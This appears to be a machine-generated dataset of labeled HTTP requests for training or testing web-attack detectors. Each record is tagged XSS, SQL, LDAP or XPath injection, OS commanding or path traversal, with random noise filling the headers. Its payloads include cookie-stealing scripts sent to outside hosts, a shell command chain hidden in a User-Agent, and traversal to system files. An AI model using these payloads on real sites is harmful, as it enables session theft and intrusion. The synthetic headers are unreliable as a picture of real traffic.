Content-MD5: c05ldGV5YWlyMjB6dWl4aA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 31 Mar 07 22:55:08 GMT
Last-Modified: Wed, 06 Oct 04 20:32:43 CET
Host: www.mlmb42btrs.fr:2975
Connection: close
Accept: image/jpeg;q=0.6, text/xml, audio/*
Accept-Charset: *
Accept-Encoding: compress;q=0.1, compress, identity;q=0.2
Accept-Language: wee)(&(objectClass = bafl*)
Cache-Control: no-store
Client-ip: 42.170.193.199
Cookie: cSUnc6beaoehteO=ietdwtexontnezN;te7eid=xtermawindow.open=fhavingzimge havings']ltbetweeneor
Cookie2: $Version="35"
Date: Sun, 23 Aug 09 07:19:37 CET
ETag: "iLW@6vsQxq499o6Y"
Expect: 100-continue
From: atitro@THsros.uk
If-Modified-Since: Sat, 14 Oct 06 02:28:19 UTC
If-Unmodified-Since: Sun, 30 Jul 06 08:56:36 CET
If-Match: "mXd59_-pehX3HAJ3"
If-None-Match: *
If-Range: Sun, 13 Nov 05 08:54:20 CET
Max-Forwards: 2890
MIME-Version: 9.1
Pragma: no-cache
Authorization: Basic bG1zaWVvZzpvemNlb3M=
Referer: http://oule4d.org/hststMa/tIelsd/4lots/jotanu.dll
TE: chunked;q=0.7,gzip,trailers
Trailer: Authorization
User-Agent: a6dxoih (tFCJ2Wr2UL; stmoIeiu; dmjg_8.M)
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7332x461
Via: 5.6 181.42.245.15:17
Transfer-Encoding: identity
Upgrade: aoese/7.7, il7/0.0, iNtwe/2.8, ofsd/5.6, naOq/0.5
Warning: 460 www.hils.png "etktedo" "Thu, 14 Dec 06 04:54:10 CET"
X-Forwarded-For: 84.228.185.10
X-Serial-Number: 6446333
----: -----------------
~~~~~: ~~~~~~~~~~~

idarnerb=nsin2YRdDu&oiefa=<(nselecti&aEsf=107

End - Id: 39026
Start - Id: 48090
class: XSS
GET /mIqt8/g.K.Qw2DkB.-QDLrSq/aerEidyeooocnr/yredeGizeE/rlvhlAx4vtr7/hROBO6/tuXj2jZAH.7i/0MQhky9m1mz-0bYI3DY.asmx?0qlr=75421471&Moh=7370422&iENtHehcuEQ8=604&rn=tcmwe&ZeHbw.sCg0dB=%3Cscript%3Ealert+++%28+++%22+Noe.ttEEr%22%29%3C%2Fscript++%3E&Dfnph-bodyOMOV0O_-=5QNsLaHH&setNsdac=xjf.RFB&uiPtenYe=nablqa&Aoy=te%3Bunnuao&i4a8a5s=407&SEqnu8=aNlev&oo0rrxrbmdcmet=Cs HTTP/1.0
Host: 78.227.252.207
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 181.67.76.99
Cookie: m0=1s ;V1wDS=sAeooszs;oleoersnra=wnqo5s3lu
Cookie2: $Version="484"
Date: Tue, 06 Mar 07 02:26:46 CET
ETag: W/"f2Ef.UQP5@VK81BRTV"
Expect: 100-continue
From: pr43lq@7remye.cz
If-Modified-Since: Fri, 16 Oct 09 09:39:57 CET
If-Unmodified-Since: Tue, 15 Nov 05 13:40:12 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 26 Jan 10 12:22:26 UTC
Max-Forwards: 4797
MIME-Version: 2.8
Pragma: 8eei8s=PEcrap
Proxy-Authorization: Basic bGVpbnJsaTpvb2lDbA==
Authorization: Digest algorithm=MD5
Range: -179295,540225-63
Referer: /Feeam/sMan/staaua.gif
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: ntonxn/9.8.1.5.1
UA-CPU: Sparc
UA-Disp: 367,260,16
UA-OS: Win95
UA-Pixels: 6001x2247
Via: HTTP/0.9 97.240.1.246, 0.6 67.131.86.140, njhoOo/4.4 173.241.197.147:504
Transfer-Encoding: deflate
Upgrade: latA/6.2, lyernh/8.8, vU0s/9.0, esnis/7.5
Warning: 356 www.tzeinr.css "til8sinolr" 
X-Forwarded-For: 69.186.228.89
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48090
Start - Id: 37307
class: LdapInjection
GET /n3pmhtz/oO2URVHprX_pYk7pdKv.nsf?OdrloaintOvru=s&Gn0ees=erDg&AoepubmEo=902739&tEhr=465117&mnsea=245089&5tocln=V1rqqhhqteAabeiwws HTTP/1.0
Host: 127.55.228.72:80
Connection: keep-alive
Accept: video/quicktime, text/*, application/*
Accept-Charset: cp-936;q=0.3, windows-1254;q=0.5, windows-874;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: )   (   | (   cn=*o    'brien*  )(mail    =*o  'brien*  )   
Cache-Control: no-cache
Client-ip: 114.21.239.10
Cookie: tbszcjInakr=866071;aeecxnIr3eosa=98299;Ssasac=f7vhocE7hA1o;uow=eHiU;G0l-w60vzM3=d?itl;os;aooktdthrapc8==Dps2eidw
Cookie2: $Version="408"
Date: Thu, 18 Jun 09 04:46:39 GMT
From: renaseu@zeie4ptso.uk
If-Modified-Since: Sun, 13 May 07 11:24:46 GMT
If-Unmodified-Since: Thu, 26 Jun 08 01:55:19 GMT
If-Match: "3GrgUAMR@Jq8KcBS"
If-None-Match: *
If-Range: *
Max-Forwards: 61
MIME-Version: 2.5
Pragma: nlatf=1ho
Authorization: Digest nc=db30Cb41
Range: 9-
Referer: http://www.aeYseleD.st/seXranad/dsett/Aela.txt
TE: trailers
User-Agent: Mozilla/4.9 (Windows; U; WinNT 9.5; an-Tl; rv:6.0.4) Gecko/70800980
UA-CPU: Sparc
UA-Disp: 6088,0787,32
UA-Color: color16
Via: 8.1 www.arbleen.tiff
Transfer-Encoding: deflate
Upgrade: me0rtS/2.5, meFrup/7.5
Warning: 988 www.Panx.gif "uhhf" "Wed, 07 Mar 07 21:03:39 UTC"
X-Forwarded-For: 97.235.140.149
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37307
Start - Id: 49961
class: XPathInjection
GET /hfhOetfqjiRtessy/t7v@-z/nuer6dnHWQQ23Q/oCbae-R7T6laoj/-Zu@/0hiimxcnsau/2H7/atf/0ae6p6n/5ZG7/hPv8T/5kLR-.pl?sTr2nnvyeaLylo=8a9EsgsfstS&ib1=3na1Sfwihdy%2Bd&vof=s&m9jem6pEe3eet=8935&vetaitb=tdh4qhErDras&uapsSg98cxlhute=tccstg%27+++or++++1%3C++++eavhe%2Figktb%2FttbO%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D0%5D++or++++%27z8nadO%27+%3D+++%27 HTTP/1.0
Host: 197.211.235.172
Connection: uscsrar5
Accept: application/zip;q=0.5
Accept-Charset: us-ascii, iso-8859-4;q=0.3, windows-1251;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=97309
Client-ip: 125.102.128.225
Cookie: eng9munpCcs2ao=s9dhUNlhW;uTetCtczrn=084043
Cookie2: $Version="5"
Date: Wed, 18 Jul 07 03:17:22 GMT
ETag: W/"hQ4l.RD7dOpBmeEgodH"
Expect: 100-continue
From: jOaulrtZ@oAt2Eo.gov
If-Modified-Since: Tue, 06 Feb 07 11:19:53 UTC
If-Unmodified-Since: Tue, 02 Mar 04 01:13:48 UTC
If-Match: "Cp3Q1Puvr6h99R7X5L"
If-None-Match: *
If-Range: *
Max-Forwards: 72
MIME-Version: 0.7
Pragma: wj='reioOri'
Proxy-Authorization: Digest username="eo31e"
Authorization: NTLM ZW50ZU9idGRtb295OW50eWFPeUp0MHRubXM3SHRzdXRic3Vybg==
Range: 73758-,-8229
Referer: /z0ottpt/Webeie0z/N9tle3ll.php3
TE: trailers,chunked;q=0.1
Trailer: If-Match
User-Agent: Mozilla/4.0 (X11; U; Solaris 8.0; uu-me; rv:2.9.8) Gecko/21198915
UA-CPU: x86
UA-Disp: 5750,1984,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 207x5488
Via: HTTP/5.5 www.6AbyeiT.css:652, 3.2 208.230.230.70
Transfer-Encoding: gzip
Upgrade: e4ie/0.4, c9r/4.8, ku8lnp/5.4
Warning: 631 www.reelek.js "sooCrilind" 
X-Forwarded-For: 199.10.120.226
X-Serial-Number: 84157643689
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49961
Start - Id: 37189
class: LdapInjection
GET /tae/Qw/eiZWD/hmh/py.h/8mibbeseE4eet4tiadla/6tla/6wOxl5Wjc/iPNGZTPrGmpYUWC/xcUdCb8vekiBR5d/bodyjJXvd_dMFlOc5P/rLO2kHX.shtml?rIcd3esersasr5=79&3gn=style&haetbsy7sr=ub%29%28%26%28objectClass%3D++sog*%29&Zni=bsN9o&ohtacces_kdfEhps=oilen&rit0dtm7Ratm=dt&aicterwrefhsi=AhttlrHrjniap HTTP/1.0
Host: www.odi2hfpwl.com
Connection: keep-alive
Accept: application/zip, image/png;q=0.6, image/*
Accept-Charset: isiri-3342;q=0.6
Accept-Encoding: *
Accept-Language: Ut-etdclst;q=0.4, fah7g-etB
Cache-Control: only-if-cached
Client-ip: 45.223.151.51
Cookie: nsinet55O=h5vcNheG
Cookie2: $Version="2"
Date: Sun, 03 Aug 08 12:23:10 CET
ETag: "gWkihjapRYwi3oCzZ"
Expect: sgdaie
If-Modified-Since: Wed, 10 Dec 08 16:22:40 CET
If-Unmodified-Since: Sun, 02 Nov 08 12:47:58 CET
If-Match: "fkv@1.SCwBqyLLIEcte"
If-None-Match: *
If-Range: Wed, 14 Sep 05 03:31:26 UTC
Max-Forwards: 12
MIME-Version: 6.5
Pragma: 4a=9
Authorization: iai0nd 4nyszpea=dnbr
Range: 3385-,6968-,40-033
Referer: http://www.eoqidae.cz/ouasaasa/ytftfseo/anua.doc
TE: trailers,chunked,chunked
Trailer: Warning
User-Agent: Mozilla/3.9 (Machintosh; U; Mac OS X 3.8; el-iE; rv:8.1.1) Gecko/26000516
Via: FTP/9.7 www.levx8zb.tiff:83
Transfer-Encoding: identity
Upgrade: fegweB/8.6
Warning: 049 www.snrd.js "elEedMobfonU" 
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37189
Start - Id: 42641
class: SqlInjection
GET /rANWplwRu0@60HmFzEci/eEzc.sh?F3hWDuRstS8=nrwC1jT3u8M&lArm5Ht7vrt=0446&Wndrkitnsan2=mnlnoo4Bg&0nidnDs=bvwEpGW&g3rhiedi1at1xto=OR++++%27nr%27++LIKE++++%27Sim%25%27&sbR=h%27a&qysiazt=t%28d%26a&FNa2QlsIEh=n9irohp+peY-wr&mtttasT=o1cIssmisstAgF&k4htacces2idjYF=57059 HTTP/1.1
Host: 57.99.144.247:9105
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: compress;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 102.208.107.2
Cookie: svthnglmhimwl=7424630;pconitlyioynh=6505191;len= h3 (egge;bgsound-rms8mailS_iEO=tnznsEadgcfl;HuNr=ec ;wdbjfeA3fc=tn
Cookie2: $Version="7"
Date: Wed, 04 Oct 06 17:35:49 UTC
ETag: "w8Zou2YQekyqpbQNzJ"
Expect: 100-continue
From: z74ht@xqb9ivEose.gov
If-Modified-Since: Mon, 08 Oct 07 22:05:15 UTC
If-Unmodified-Since: Mon, 09 Aug 04 22:26:17 GMT
If-Match: "ExamKPEtgjPtMRyFq"
If-None-Match: "t3ZZn9T7aZU5gRt"
If-Range: "vVRJst@F7XtESRAgqj_8"
Max-Forwards: 4
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: gubga cAtOapm=polma
Range: 72326-9838
Referer: http://d64hoia.it/na9c/me8edtaa/e1Uen/Qc0uaits.jpeg
TE: chunked
Trailer: If-Modified-Since
User-Agent: eSawhahfae (ik54qb62-w; tMLON@h-)
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 4720x346
Via: FTP/0.7 136.93.198.77:38
Transfer-Encoding: gzip
Upgrade: hoefdi/5.8, afmr09/0.6, fgj/9.1, mds/0.8, 8sseh/8.0
Warning: 581 www.sne7zbS.jpg "ltfyPl" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42641
Start - Id: 46931
class: XSS
PUT /tAg@7M9oH8k4ccUD6TE9/isea6esoeewtgl6/d2huoe0ebgeeAtj/et2geNcyb6oo06ealiie/yUP6HhH6I/buFbgsoundSq70dhJtH-netcatc.cgi? HTTP/1.0
Content-Length: 156
Content-Language: ae7d,a
Content-Encoding: deflate
Content-Location: http://www.oduot.uk/Oico2/seclo.htm
Content-MD5: b2VJNG5qYWhTdGU5MmVvbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Sep 05 19:56:22 UTC
Last-Modified: Mon, 21 Jul 08 20:59:21 CET
Host: 213.236.227.75
Connection: temozt
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, gzip;q=0.9, identity;q=0.2
Accept-Language: rmtts8e-umttd2l
Cache-Control: Etez='w'
Client-ip: 76.30.12.210
Cookie: jloypaone=r 
Cookie2: $Version="688"
Date: Sun, 30 Dec 07 11:55:49 UTC
ETag: W/"@EO1@@IWjcaKk@I8WI82"
Expect: Loer=fteWoeui
From: eiatt@esmwa8oeu.gov
If-Modified-Since: Wed, 03 Mar 04 23:49:43 UTC
If-Unmodified-Since: Mon, 19 Feb 07 17:04:20 GMT
If-Match: *
If-None-Match: "cBiae9XfbJD70fYR"
If-Range: *
Max-Forwards: 695
MIME-Version: 1.5
Pragma: qldA=i3ones
Proxy-Authorization: Basic Y3BzTW06d3lkc04=
Authorization: Basic bndlN2hsYTpoeWhuOWFh
Range: -80,-788
Referer: /hrAnhue/ti9esne/efsheai/5EwN.wmn
TE: gzip;q=0.1
Trailer: Accept-Encoding
User-Agent: Mozilla/2.8 (Windows; U; WinNT 8.2; co-sc; rv:5.3.5) Gecko/15946172
UA-CPU: MIPS
UA-Disp: 4346,951,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 642x9764
Via: FTP/0.8 www.wkhtrh.gif, 8.0 109.228.109.100:42, soe/1.6 www.eStm.gif
Transfer-Encoding: deflate
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 133 128.21.84.17 "ewraoseeFm" "Fri, 27 Feb 04 19:29:24 CET"
X-Forwarded-For: 207.203.23.208
X-Serial-Number: 4682138
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

eoo=<div  style  =  " width:    expression([window.open('http://216.254.17.210/el.sh'+document.cookie);]);     " >

End - Id: 46931
Start - Id: 37601
class: LdapInjection
POST /ux2o2buDoxteprdj/cb81NZiXCh/eG1.ZBlyAcvsCHO8/h2tsha7ol/eQ6mG_Um1JTwm/lt2qO/wrytnaramrv/oCqLNMzJWKe7bpaVT2/eahsUmAav1ujt2mk1/tesieussa/1ia.jpeg? HTTP/1.1
Content-Length: 96
Content-Language: i,dpt
Content-Encoding: identity
Content-Location: /jayTpMl4/7oeoc0.exe
Content-MD5: b3RkaHYzY3RyMER0ZUthZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Aug 09 14:07:46 UTC
Last-Modified: Fri, 04 Aug 06 09:31:37 CET
Host: 154.118.89.176
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hnNrRVdg-atjwn;q=0.7, daaultt-hfsiTPgn;q=0.7, r-ttezael;q=0.3
Cache-Control: no-cache
Client-ip: 232.58.119.182
Cookie: fusbve=riT Hda te;w84dm=627926;he=jFZoBC9;eiier4=aT13ku;atleut=cemt
Cookie2: $Version="2"
Date: Tue, 16 Jun 09 03:48:41 CET
ETag: "@QX@_ywUL101QKMd"
Expect: 100-continue
From: jx1d@1fuiaeebw.uk
If-Modified-Since: Sat, 18 Sep 04 06:42:35 UTC
If-Unmodified-Since: Fri, 20 Aug 04 20:31:25 GMT
If-Match: *
If-None-Match: "qqMuAopr3ZgKbwt"
If-Range: "7.E-0cpfveONQwjV0V3"
Max-Forwards: 094
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: wCwbd1 E1saai=4olnf
Authorization: NTLM Z2YxM2lmdHl0aG1udG1ydEF0cm9BV2U4aUF3cnJ0dzBJbmxlbW5ybjd0
Range: 2-4,-9680
Referer: http://www.coFeem.com/aowgrsa.fgf
TE: chunked;q=0.2,trailers
Trailer: Accept-Language
User-Agent: 6nEchacTii/5.3.2.6
UA-CPU: PowerPC
UA-Disp: 752,1342,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 770x317
Via: 2.2 201.112.45.110
Transfer-Encoding: deflate
Upgrade: vYs/1.2
Warning: 943 www.FaAepr.shtml "i9ws4h7nus" 
X-Forwarded-For: 105.35.228.101
X-Serial-Number: 35061677814454
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Nno=ist)(   |(Hednt=*)&JnQ@n=sY7TAu3n_7&fsBhnnobsn=khumD(0m9 prmchild>atns=rcp

End - Id: 37601
Start - Id: 46701
class: XSS
GET /qenty/puU04/psoer97/oebcdHoaSwesp/fetrytieidfyn/qyondvl3ISde/aEyX3rGKKfW3ztf/6a8wdCFYAIQhzFsROT/b.onull/eLSTY02TJ2jBIlQC-2SE/iwzy/2oov3v.htm?shc=nhe+&JYbYgfs=26&vbscriptxf6samKr0a=soetauur&tmgakemmcskl=1891255&iHxmoecsccsy=Iqadneoonarne&0Ogbhnotnkn=scriptqlSvmtootc&heepurtd4=r-cIR3z0C&MffrcpnNdivWFdrop=sXfg_&qPAscriptZxmlVTV0h=alEnbomS&q3B3-8=tntata15ntl&htacces_XZMbinwL3=5964640&ylAPLn.home=13825198&ulibhs=%27s%3Deaolnrhka+n&iuy4to=znospnt HTTP/1.1
Host: 164.154.36.199
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: windows-1255, gb2312;q=0.0, iso-8859-3;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 194.31.187.100
Cookie: bgc8adbotlefdH=rue;rnrhny0thoei=93935156;iledsrgcacH=toT9;arypocnx3resh=nQdlo;efaipoced=Rangn5ebTaob;iFoyr=<img     dynsrc  ="  javascript:    [document.location.replace ('http://www.elnsorro.com/cgi-bin/icisen.cgi'+document.cookie);]     ">
Cookie2: $Version="000"
Date: Tue, 24 May 05 24:38:49 UTC
ETag: W/"brH8Xc_QOwh1tFEjJ175"
Expect: Rcudeep=ohiaow
From: sydmNoRr@eYicvet9.com
If-Modified-Since: Wed, 17 Jun 09 08:53:21 CET
If-Unmodified-Since: Fri, 11 Nov 05 09:33:18 CET
If-Match: "iWBRTxdiDG04m44KDJfT"
If-None-Match: *
If-Range: Thu, 01 Oct 09 12:40:13 GMT
Max-Forwards: 34
MIME-Version: 7.6
Pragma: on='tezaTih'
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest algorithm=cE8srfTv
Range: 932-03,777-
Referer: /0ttca/orce/patizoa/trcrb/essowoe.png
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/2.9 (Machintosh; U; PPC Mac OS X 6.9; ef-R3; rv:4.1.1) Gecko/05931920
UA-Disp: 240,199,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 007x164
Via: 7.4 www.iyojq.htm, hh5Oy/2.5 www.hedqmd.html:47, HTTP/2.6 222.53.12.202
Transfer-Encoding: deflate
Upgrade: oa7ner/6.8, tdsyot/0.1, lom/8.5
Warning: 710 244.32.72.52 "phsreeteta" "Fri, 24 Feb 06 09:05:16 CET"
X-Forwarded-For: 220.87.91.135
X-Serial-Number: 9170068717
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 46701
Start - Id: 41984
class: SqlInjection
GET /ulQ1q3_.cVXKwf/telitkdasRna/firuw/yp/7-2v9vxuhZ2/U1Im@BT9ZkthtpassNshutdowne/AwD7X-N/eTr.tiff?auiieiE=q0e5+i1o0neto&ht=%27+OR++++%27%27+%3D++%27&37wtaht7uIoktde=4822276&gsuo=O&tne=3295973&etHj=niree9reservicese%2Fotgap&O4LRpassthrud6perlcopyFLL=2819&eHiob=tiz4JG083y&xksinI54=Ouitlph++oilita4&1hp-_bPipyI=itoe8Eeesjelnt1ui3&doNnC3l=aGpxZ&ci=oOj6q HTTP/1.0
Host: 72.114.232.206:80
Connection: bd0ry
Accept: text/plain;q=0.6, image/*
Accept-Charset: x-mac-icelandic, windows-1253;q=0.2
Accept-Encoding: 
Accept-Language: et2w-e7ceamaw, s-nwdscet;q=0.2
Cache-Control: min-fresh=06912
Client-ip: 41.133.176.17
Cookie: hcg=5375748072
Cookie2: $Version="9"
Date: Wed, 31 Dec 08 22:18:36 CET
ETag: "H-wtGNRWTakDfVw7"
Expect: taus=aiyn
From: Iyirabt@mar7tEeeb7.de
If-Modified-Since: Mon, 24 Nov 08 05:30:00 GMT
If-Unmodified-Since: Mon, 12 Sep 05 23:55:48 GMT
If-Match: "faCz9wCgdUUd@o@eBepe"
If-None-Match: *
If-Range: *
Max-Forwards: 389
MIME-Version: 0.8
Pragma: otniwcif='n7l'
Proxy-Authorization: Digest uri=http://Ih9gc.net/soss.txt
Authorization: Digest nc=dae49E08
Range: -728027,84041-8,736156-
Referer: /6tbn3/ceetlno/Reebc/Yoii/eIryl.shtml
TE: chunked;q=0.7,chunked
Trailer: Accept-Charset
User-Agent: lNl8h (4q.q-omkfI; rpTUJO; lKCn0t)
UA-CPU: Sparc
UA-Disp: 4298,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8709x899
Via: 6ucKLt/1.7 www.betno.jpeg, FTP/6.9 219.111.145.75
Transfer-Encoding: gzip
Upgrade: tsem/9.8, icrMn/2.4
Warning: 119 141.109.167.27 "sebrw" 
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 772384141
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41984
Start - Id: 43629
class: OsCommanding
POST /iLnf9WyCJE/7qREQ/uBeqc7djqwI4rPWxLUvH/U.UjQQ4openR3.asmx? HTTP/1.0
Content-Length: 167
Content-Language: 1hre4w
Content-Encoding: identity
Content-Location: http://e7ul.it/ledhde.aspx
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 25 Dec 07 06:40:37 UTC
Last-Modified: Sun, 08 Jul 07 16:20:52 GMT
Host: 145.31.110.61:80
Connection: fnSn
Accept: */*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: compress, compress, deflate;q=0.4, gzip
Accept-Language: ajo-jaahi, d-hnkbec, s-s7wfgrea, 4lstztlc-f;q=0.5, gtmdoaqe-6rawnnn
Client-ip: 54.169.103.139
Cookie: ybohhv=4852361;K7lb=dcooa
Cookie2: $Version="8"
Date: Wed, 30 Sep 09 14:22:27 CET
Expect: 100-continue
If-Unmodified-Since: Fri, 18 Apr 08 10:12:12 GMT
If-Match: "TfZSQwQrU9.Z_qv6"
If-None-Match: "ajPZb.q3ehZ6U9ybr2"
If-Range: *
Max-Forwards: 22
Authorization: Basic ZTZlZTo0RDVydHN3dA==
Referer: http://aaywose.st/SsnMmcg/gm9dwt/hoityf.shtml
User-Agent:     ;  echo     ;  w        ;   uname    -a        ; id
UA-OS: FreeBSD
Via: 8.7 6.167.95.222
Transfer-Encoding: identity
Upgrade: cui/0.1
----: -----------------------

eob4ocwaef=iKo1H8&swg=sijmy4ox@i&cunoqs=nnhin&Ltau=l&shzAens=aagSote1&woa89ittteEue=6&nelaetoetos=-fromsi6Evftp( C2eesx&lnntmde=]eval&cn7lyaj1=j8ofH&a4snc=iporhe

End - Id: 43629
Start - Id: 37340
class: LdapInjection
GET /Hupdatebt6KN%u0stdinH/30ifgEtwntsW/hgaa2fzcpepa8rurSX/YrkMItmpr/EfrlehnihnO/i-B8Pt/FNBPs9G/e.Pzv3km35KGi/liel.png? HTTP/1.0
Host: www.f3lffutT.uk
Connection: close
Accept: video/quicktime, audio/*, text/*;q=0.9
Accept-Charset: *
Accept-Encoding: )(|    (   cn=*o    'brien*)(mail   =*o   'brien* )   
Accept-Language: iso-em;q=0.1, vetmzwt6-euee, 5-errge;q=0.6, inauc-ehehkza, laeeGuy-a4roA;q=0.5
Cache-Control: no-store
Client-ip: 34.206.64.183
Cookie: fcjoydip=ecrdgns;urq4=we@a?thaving;imp0dom
Cookie2: $Version="7"
Date: Sun, 13 Jul 08 03:24:54 CET
ETag: W/"NJ1.2WEgk_6awsr54"
Expect: 100-continue
From: elbo@eieuetfntT.fr
If-Modified-Since: Sun, 10 Oct 04 19:26:14 GMT
If-Unmodified-Since: Wed, 07 Jul 04 08:35:53 GMT
If-Match: "kWDQ-.YU_-oQvQYqRp"
If-None-Match: *
If-Range: "6xH2@5W0ssXsZjhHKQV"
Max-Forwards: 44
MIME-Version: 7.2
Pragma: x='l3m'
Proxy-Authorization: lsrrid nactta1e=moee
Authorization: 83le wArhSocv=ReiigfTl
Range: 54145-,-678850
Referer: http://gtUt7apl.gov/restaw/lsmDr/bactOcrs/rhiisstI.php3
TE: trailers,gzip
Trailer: Range
User-Agent: Mozilla/1.0 (compatible; zIyu; SunOS sun4u; AfIele; hheeRsea; bcreoitJwO)
UA-CPU: 68000
UA-Disp: 915,366,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 495x1616
Via: FTP/5.7 www.tume.css:02580, 1.6 190.147.107.218
Transfer-Encoding: gzip
Upgrade: o3106M/9.9, E9rle4/4.1, oohnne/6.6, eelrde/4.9, Ix7ea/1.8
Warning: 830 www.ane2.html:1 "vjdynls" "Sun, 23 Nov 08 23:13:16 CET"
X-Forwarded-For: 172.124.5.186
X-Serial-Number: 06549032
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37340
Start - Id: 45878
class: PathTransversal
GET /70mtrfeton/pexiet4ohneworprsE/Aanlniwpw6tv/apLqO4mi4l/SV/mWI1SVldT09eiOb5/CpasswdhtaccesSmAphpQo/ae1ss2n/ccyeqGb7G/rHSvmuJz7Unc5B.shtml?hnpmewtooi=qhg_osh9i&oftSrayrrjle=9221984837&wisaes83r1deRI=sEIrt&Da6chtI=wo0&hs=nAl2Mh1UNCF&izarsssoe8yasR=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&e4odhos=hfe%3Anoofqwox&RiTl1bsrA6paIri=mIIoty&tit=0&lswum4wd=%3Dnea0xz%5Dsinsfr2&aiesaartednm=Rl+gsusrOneeEhomel HTTP/1.1
Host: www.sHCnnuas.net:781
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=9
Client-ip: 251.11.69.130
Cookie: 9yhI=78;nO=55ly
Cookie2: $Version="07"
Date: Thu, 06 Apr 06 23:41:38 CET
ETag: "qcIN6.ToaSAjnoWr"
Expect: r9wd
From: 5roeHeR9@nsl4pe.de
If-Modified-Since: Thu, 30 Jun 05 20:25:14 GMT
If-Unmodified-Since: Tue, 01 May 07 22:15:29 UTC
If-Match: "G26ugG9CeSPmKJsmF."
If-None-Match: "4FeUjTsqUR9znO0sZ68U"
If-Range: *
Max-Forwards: 189
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM b2hmdHJpYmF0aUFzZWFwRjRpbGw2ZmUxc3dyaGRzMnllZmhtZGg3M2hhdGhl
Authorization: NTLM dGxjcnhpY25lcjNhckRvM2F1dGNsdDhpbWhlbXQyc2hpdGV1ZWU=
Range: 81947-,357703-
Referer: /9xidr9/e6t6si/ooYeeae/6nwh.ace
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: nCiVlcct http://www.hro0fec.be
UA-CPU: StrongARM
UA-Disp: 239,737,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0549x672
Via: 7.8 www.2Sennyn.jpg:7537, 3.9 www.esrT.htm, HTTP/5.1 134.72.214.137
Transfer-Encoding: pqirj
Upgrade: uerl/3.0, gur/9.5, vSut/6.5
Warning: 742 165.170.93.206 "swnoxaS" 
X-Forwarded-For: 39.173.242.210
X-Serial-Number: 9205115584869
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45878
Start - Id: 44957
class: PathTransversal
GET /d8rehuChHSeiert/oIeK/rOKd75qZ3CsYMVC.jsp?Bn=u%5D%2FmuLeilspt%25e&DDY7whereyinFdidw=Esx+ieef&iWulHcnaj=071&tnelhtec3siah77=20&hctiPe7albfbufx=s1xml&ntptrrsis23su=%2F.%2F..%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F..%2F&jntotrts2c1u=1438&tmpzWgRAAG9=sarstyleienecShuor%28bew+d&iagzscwe=hethryyErWo4whN HTTP/1.0
Host: 57.247.97.83
Connection: Rtm0vtau
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: aoznu-a;q=0.6, aoulcy-hlc0carh, yewgem1o-el;q=0.9
Cache-Control: max-age=70
Client-ip: 132.242.52.39
